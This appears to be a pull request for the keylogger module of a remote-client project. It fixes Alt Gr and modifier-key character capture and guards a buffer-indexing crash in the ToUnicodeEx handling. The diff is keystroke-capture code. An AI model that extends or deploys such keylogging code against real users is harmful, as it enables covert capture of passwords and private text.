### PR TITLE
Keylogger fixes

### DIFF
--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -126,7 +126,7 @@ namespace xClient.Core.Keylogger
         //This method should be used to process all of our unicode characters
         private void Logger_KeyPress(object sender, KeyPressEventArgs e) //Called second
         {
-            if (LoggerHelper.IsModifierKeysSet(_pressedKeys))
+            if (LoggerHelper.IsModifierKeysSet(_pressedKeys) && (_pressedKeys.Contains((Keys)char.ToUpper(e.KeyChar))))
                 return;
 
             if (!_pressedKeyChars.Contains(e.KeyChar) || !LoggerHelper.DetectKeyHolding(_pressedKeyChars, e.KeyChar))

--- a/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
+++ b/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
@@ -109,7 +109,7 @@ namespace xClient.Core.Keylogger.WinApi
                 // Two or more (only two of them is relevant)
                 default:
                     if (pwszBuff.Length > 1) chars = new[] { pwszBuff[0], pwszBuff[1] };
-                    else chars = null;
+                    else chars = new[] { pwszBuff[0] };
                     break;
             }
 

--- a/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
+++ b/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
@@ -102,7 +102,8 @@ namespace xClient.Core.Keylogger.WinApi
                     break;
 
                 case 1:
-                    chars = new[] { pwszBuff[0] };
+                    if (pwszBuff.Length > 0) chars = new[] { pwszBuff[0] };
+                    else chars = null;
                     break;
 
                 // Two or more (only two of them is relevant)

--- a/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
+++ b/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
@@ -102,8 +102,7 @@ namespace xClient.Core.Keylogger.WinApi
                     break;
 
                 case 1:
-                    if (pwszBuff.Length > 0) chars = new[] { pwszBuff[0] };
-                    else chars = null;
+                    chars = new[] { pwszBuff[0] };
                     break;
 
                 // Two or more (only two of them is relevant)

--- a/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
+++ b/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
@@ -108,7 +108,8 @@ namespace xClient.Core.Keylogger.WinApi
 
                 // Two or more (only two of them is relevant)
                 default:
-                    chars = new[] { pwszBuff[0], pwszBuff[1] };
+                    if (pwszBuff.Length > 1) chars = new[] { pwszBuff[0], pwszBuff[1] };
+                    else chars = null;
                     break;
             }
 


### PR DESCRIPTION
(Please ignore the reverts, I've just installed Visual studio 2013 on my host and noticed it has a github feature pretty neat!)


in the Logger.cs file what this fixes:
-if any modifier keys are down and a character is pressed on the
keyboard, it will look for a Key from the key character, if it doesn't
find it, it will process the character normally.  This is as best as I
could do for Alt Gr because Alt Gr translates to (LControlKey |
ControlKey).  In order to get Alt Gr presses to work, normally you would
have to press (Ctrl + Alt + key) to write the characters such as the
ones here highlighted in blue:
http://en.wikipedia.org/wiki/German_keyboard_layout#/media/File:KB_Germany.svg

This introduced a bug into the KeyboardNativeMethods class,
IndexOutOfBoundsException.  The buffer from ToUnicodeEx was returning a
an index of zero.  ?????? (this is a bug in the operating system).  I tested this by pressing
(Ctrl + alt + all keys on my keyboard, specifically Ctrl + alt + [ and
Ctrl + alt + numpad return key that were causing the crashes)